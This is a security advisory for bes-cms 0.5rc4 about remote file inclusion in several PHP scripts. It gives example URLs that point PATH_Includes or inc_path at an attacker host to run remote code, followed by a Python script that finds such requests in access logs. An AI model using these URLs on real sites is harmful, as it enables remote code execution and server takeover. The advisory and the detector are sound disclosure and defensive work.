Software: bes-cms 0.5rc4
A file inclusion vulnerability has been found in
bes-cms. A remote user can execute arbitrary commands on the target system.
The file inclusion vulnerability is present in several scripts
(index.inc.php, Members/index.inc.php, Members/root/index.inc.php, Include/functions_folder.php,
Include/functions_hacking.php, Include/functions_message.php, and Include/Start.php). As a result, a remote attacker can execute arbitrary PHP code on the vulnerable system.
Example:
File inclusion (if register_globals=ON):
http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php?PATH_Includes=http://[attacker]/
Could include the file: http://[attacker]/actions_default.php
http://[target]/Include/functions_folder.php?PATH_Includes=http://[attacker]/
Could include the files: http://[attacker]/functions_folder_modules.php
http://[attacker]/functions_folder_plugins.php
http://[attacker]/functions_folder_files.php
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=logger
Could include the file: http://[attacker]/functions_user.php
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=send_bug&UserDetails[LOGGED_IN]=YES
Could include the file: http://[attacker]/functions_error.php
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=content_view
Could include the file: http://[attacker]/functions_message_docTypes.php
http://[target]/Include/functions_hacking.php?PATH_Includes=http://[attacker]/&itemID=search
Could include the file: http://[attacker]/functions_general.php
http://[target]/Include/functions_message.php?PATH_Includes=http://[attacker]/
Could include the files: http://[attacker]/functions_message_docTypes.php
http://[attacker]/functions_message_edit.php
http://[target]/Include/Start.php?inc_path=http://[attacker]/
Could include the file: http://[attacker]/Include/vars.php
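Detection sketch for the request pattern above, as an added example that is not part of the original advisory or of bes-cms: it scans web server access log lines for requests to the listed scripts that set PATH_Includes or inc_path in the query string. It assumes common/combined log format and that the application never sends these variables as request parameters itself; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Include-path variables and scripts named in the advisory.
SUSPECT_PARAMS = {"PATH_Includes", "inc_path"}
AFFECTED_SCRIPTS = (
    "/index.inc.php",  # suffix also matches the two Members/ copies
    "/Include/functions_folder.php",
    "/Include/functions_hacking.php",
    "/Include/functions_message.php",
    "/Include/Start.php",
)
# Value begins with a URL scheme or stream wrapper (http:, ftp:, php:, data: ...).
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*:", re.I)
# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def find_include_overrides(log_lines):
    """Return one finding per request that sets an include-path variable."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        # Suffix match, so installs in a subdirectory are covered as well.
        if not url.path.endswith(AFFECTED_SCRIPTS):
            continue
        # parse_qsl percent-decodes, so encoded schemes are caught too.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if name in SUSPECT_PARAMS:
                findings.append({"path": url.path, "param": name, "value": value,
                                 "remote": bool(SCHEME_RE.match(value))})
    return findings

# Constructed sample log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=news HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /cms/Include/Start.php?inc_path=http%3A%2F%2Fhost.example%2F HTTP/1.1" 200 128',
    '192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /Include/functions_hacking.php?PATH_Includes=../lib/&itemID=search HTTP/1.1" 200 64',
    '192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /other.php?PATH_Includes=http://host.example/ HTTP/1.1" 404 0',
]

if __name__ == "__main__":
    for finding in find_include_overrides(SAMPLE_LOG):
        print(finding)
```

Only query-string parameters appear in access logs; values supplied in POST bodies or cookies are not visible to this check.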